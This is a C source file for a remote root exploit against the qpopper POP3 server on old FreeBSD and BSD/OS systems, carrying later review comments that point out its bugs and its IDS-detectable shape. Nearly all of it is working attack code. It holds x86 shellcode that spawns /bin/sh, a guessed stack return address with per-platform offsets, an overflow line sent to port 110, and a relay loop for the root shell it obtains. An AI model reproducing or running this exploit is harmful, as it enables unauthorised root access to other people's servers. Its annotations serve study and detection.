
  1. /*
  2.  *      QPOPPER - remote root exploit
  3.  *      by Miroslaw Grzybek <mig@zeus.polsl.gliwice.pl>
  4.  *
  5.  *              - tested against: FreeBSD 3.0
  6.  *                                FreeBSD 2.2.x
  7.  *                                BSDI BSD/OS 2.1
  8.  *              - offsets: FreeBSD with qpopper 2.3 - 2.4    0
  9.  *                         FreeBSD with qpopper 2.1.4-R3     900
  10.  *                         BSD/OS  with qpopper 2.1.4-R3     1500
  11.  *
  12.  *      this is for EDUCATIONAL purposes ONLY
  13.  */
  14.  
  15. #include        <stdio.h>
  16. #include        <stdlib.h>
  17. #include        <sys/time.h>
  18. #include        <sys/types.h>
  19. #include        <unistd.h>
  20. #include        <sys/socket.h>
  21. #include        <netinet/in.h>
  22. #include        <netdb.h>
  23.  
  24. #include        <sys/errno.h>
  25.  
/* Machine-code payload that main() copies verbatim into buf[].  Its
 * instruction stream is deliberately left undocumented here; the embedded
 * "/bin/sh" string shows its purpose and matches the "remote root" claim in
 * the file header.  It is a string literal, so it must not contain a 0x00
 * byte (and does not): main() measures it with strlen(shell). */
char *shell="\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
            "\x88\x5e\x1c\x8d\x1e\x89\x5e\x0e\x31\xc0\xb0\x3b\x8d\x7e"
            "\x0e\x89\xfa\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
            "\xcf\xeb\x01\xff\x62\x61\x63\x60\xeb\x1b\xe8\xc9\xff\xff"
            "\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb"
            "\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";
  32.  
/* Hard-coded guess of the stack address the overflow returns into; main()
 * stamps ADDR+offset every 4 bytes across the tail of buf[].  The file
 * header lists the per-platform `offset` values the author used. */
#define ADDR 0xefbfd504
/* Default adjustment to ADDR; overridden by argv[2] in main(). */
#define OFFSET 0
/* Size of the line sent to the server, also reused as the relay read size.
 * buf[] is exactly this large, so index BUFLEN is out of bounds — main()
 * nevertheless writes there. */
#define BUFLEN 1200

/* File-scope state, only touched from main().  Static storage is
 * zero-initialised, which `sa` relies on (sin_zero is never cleared). */
char    buf[BUFLEN];        /* the line sent to TCP port 110 */
int     offset=OFFSET;      /* runtime adjustment to ADDR */

int     sock;               /* TCP socket to the target */
struct  sockaddr_in sa;     /* target address; family/port/addr set in main() */
struct  hostent *hp;        /* result of gethostbyname(argv[1]) */
  43.  
/*
 * Entry point.  argv[1] is the target host (IP or name); optional argv[2]
 * is a decimal adjustment added to ADDR.  Builds one oversized POP3 line in
 * the global buf[], sends it to TCP port 110 of the target, then relays
 * bytes between the local terminal and the socket until select() fails.
 *
 * Review notes:
 *  - `void main` is non-standard; every failure path calls exit(0), i.e.
 *    reports success, which misleads anything that scripts this tool.
 *  - memset/memcpy/strlen are used without <string.h>; this relies on the
 *    implicit declarations pre-C99 compilers accepted.
 *  - The code targets the legacy BSD/qpopper versions in the file header
 *    and carries several latent bugs, noted inline, that make it unreliable
 *    as written.
 */
void main (int argc, char *argv[]) {
        int i;

        if(argc<2) {
                printf("Usage: %s <IP | HOSTNAME> [offset]\n",argv[0]);
                exit(0);
        }
        /* atoi() reports no errors: a non-numeric argv[2] silently becomes 0. */
        if(argc>2)
                offset=atoi(argv[2]);

        /* Prepare buffer */
        /* Fill all 1200 bytes with 0x90 (the x86 NOP opcode, consistent with
         * the i386 BSD targets in the header), then place the payload at
         * byte 800.  strlen(shell) is only correct because the payload
         * happens to contain no 0x00 byte. */
        memset(buf,0x90,BUFLEN);
        memcpy(buf+800,shell,strlen(shell));
        /* From byte 901 on, stamp the guessed stack address every 4 bytes.
         * 901 is not 4-aligned, so each store is a misaligned int write
         * through a char* — tolerated on i386, UB per the standard.  A long
         * 0x90 run followed by one repeated 4-byte value is the on-the-wire
         * shape that network IDS rules for this class of overflow typically
         * match on. */
        for(i=901;i<BUFLEN-4;i+=4)
                *(int *)&buf[i]=ADDR+offset;
        /* BUG: buf has indices 0..BUFLEN-1, so this writes one byte past the
         * array.  The intended terminating newline lands outside buf, and
         * since no NUL is ever stored, strlen(buf) below also reads past
         * the end of the array. */
        buf[BUFLEN]='\n';

        /* Resolve remote hostname & connect*/
        /* gethostbyname() is obsolete and reports failure via h_errno, not
         * errno, so perror() here prints an unrelated message. */
        if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
                perror("gethostbyname()");
                exit(0);
        }

        if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
                perror("socket()");
                exit(0);
        }
        sa.sin_family=AF_INET;
        sa.sin_port=htons(110);                 /* POP3 */
        /* h_length is trusted to equal sizeof(sa.sin_addr); for AF_INET it
         * is 4.  Remaining fields of sa stay zero from static storage. */
        memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
        if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
                perror("connect()");
                exit(0);
        }
        printf("CONNECTED TO %s... SENDING DATA\n",argv[1]); fflush(stdout);
        /* Write evil data */
        /* Length comes from strlen() on a buffer with no NUL inside it (see
         * above), so the byte count depends on whatever follows buf in
         * memory.  The return value of write() is ignored. */
        write(sock,buf,strlen(buf));

        /* Enjoy root shell ;) */
        /* Relay loop between fd 0/1 and the socket. */
        while(1) {
                fd_set input;

                /* BUG: `input` is never FD_ZERO()ed, so FD_SET operates on
                 * an uninitialised fd_set and select() may wake on garbage
                 * descriptors. */
                FD_SET(0,&input);
                FD_SET(sock,&input);
                if((select(sock+1,&input,NULL,NULL,NULL))<0) {
                        if(errno==EINTR) continue;
                        printf("CONNECTION CLOSED...\n"); fflush(stdout);
                        exit(1);
                }
                /* A read() of -1 is passed to write() as a huge size_t, and
                 * 0 (peer closed / EOF on stdin) is not treated as end of
                 * session, so the loop spins after the remote side hangs up
                 * instead of exiting. */
                if(FD_ISSET(sock,&input))
                        write(1,buf,read(sock,buf,BUFLEN));
                if(FD_ISSET(0,&input))
                        write(sock,buf,read(0,buf,BUFLEN));
        }
}